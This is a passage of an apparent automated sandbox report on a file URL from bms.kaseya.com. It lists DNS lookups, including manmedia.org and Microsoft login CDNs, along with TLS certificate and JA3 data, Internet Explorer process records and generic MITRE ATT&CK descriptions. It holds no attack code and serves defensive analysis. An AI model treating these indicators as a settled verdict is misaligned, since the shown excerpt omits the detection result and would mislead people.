Feb 23, 2021 16:02:02.036315918 CET	8.8.8.8	192.168.2.6	0x4242	No error (0)	bms.kaseya.com	origin-bms.kaseya.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 16:02:02.036315918 CET	8.8.8.8	192.168.2.6	0x4242	No error (0)	origin-bms.kaseya.com		52.144.52.222	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:02.036315918 CET	8.8.8.8	192.168.2.6	0x4242	No error (0)	origin-bms.kaseya.com		52.144.52.223	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.675731897 CET	8.8.8.8	192.168.2.6	0x20f	No error (0)	code.jquery.com	cds.s5x3j6q5.hwcdn.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 16:02:19.722986937 CET	8.8.8.8	192.168.2.6	0xcd77	No error (0)	cdnjs.cloudflare.com		104.16.19.94	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.722986937 CET	8.8.8.8	192.168.2.6	0xcd77	No error (0)	cdnjs.cloudflare.com		104.16.18.94	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.772965908 CET	8.8.8.8	192.168.2.6	0x30e1	No error (0)	stackpath.bootstrapcdn.com	cds.j3z9t3p6.hwcdn.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 16:02:19.811990023 CET	8.8.8.8	192.168.2.6	0x80a7	No error (0)	manmedia.org		204.93.216.87	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:19.847739935 CET	8.8.8.8	192.168.2.6	0x837c	No error (0)	ajax.aspnetcdn.com	mscomajax.vo.msecnd.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 16:02:21.109530926 CET	8.8.8.8	192.168.2.6	0x478e	No error (0)	aadcdn.msftauth.net	aadcdnoriginneu.azureedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 16:02:21.109530926 CET	8.8.8.8	192.168.2.6	0x478e	No error (0)	cs1100.wpc.omegacdn.net		152.199.23.37	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:39.257771015 CET	8.8.8.8	192.168.2.6	0xe7c5	No error (0)	manmedia.org		204.93.216.87	A (IP address)	IN (0x0001)
Feb 23, 2021 16:02:42.947171926 CET	8.8.8.8	192.168.2.6	0xd1c0	No error (0)	manmedia.org		204.93.216.87	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 23, 2021 16:02:19.921765089 CET	104.16.19.94	443	192.168.2.6	49735	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 23, 2021 16:02:19.921765089 CET	104.16.19.94	443	192.168.2.6	49735	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 23, 2021 16:02:19.921802998 CET	104.16.19.94	443	192.168.2.6	49736	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 23, 2021 16:02:19.921802998 CET	104.16.19.94	443	192.168.2.6	49736	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 23, 2021 16:02:21.315383911 CET	152.199.23.37	443	192.168.2.6	49745	CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 09 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006	Fri Jul 09 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031
Feb 23, 2021 16:02:21.389024019 CET	152.199.23.37	443	192.168.2.6	49744	CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 09 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006	Fri Jul 09 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 5116 Parent PID: 792

General

Start time:	16:01:59
Start date:	23/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 4696 Parent PID: 5116

General

Start time:	16:01:59
Start date:	23/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
Imagebase:	0xfb0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 6480 Parent PID: 5116

General

Start time:	16:02:16
Start date:	23/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 6544 Parent PID: 6480

General

Start time:	16:02:17
Start date:	23/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
Imagebase:	0xfb0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 4568 Parent PID: 6480

General

Start time:	16:02:36
Start date:	23/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
Imagebase:	0xfb0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 6264 Parent PID: 6480

General

Start time:	16:02:40
Start date:	23/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
Imagebase:	0xfb0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

Signature Overview

Phishing:

Compliance:

Networking:

System Summary:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 5116 Parent PID: 792

General

Chronological Activities

Analysis Process: iexplore.exe PID: 4696 Parent PID: 5116

General

Chronological Activities

Analysis Process: iexplore.exe PID: 6480 Parent PID: 5116

General

Chronological Activities

Analysis Process: iexplore.exe PID: 6544 Parent PID: 6480

General

Chronological Activities

Analysis Process: iexplore.exe PID: 4568 Parent PID: 6480

General

Chronological Activities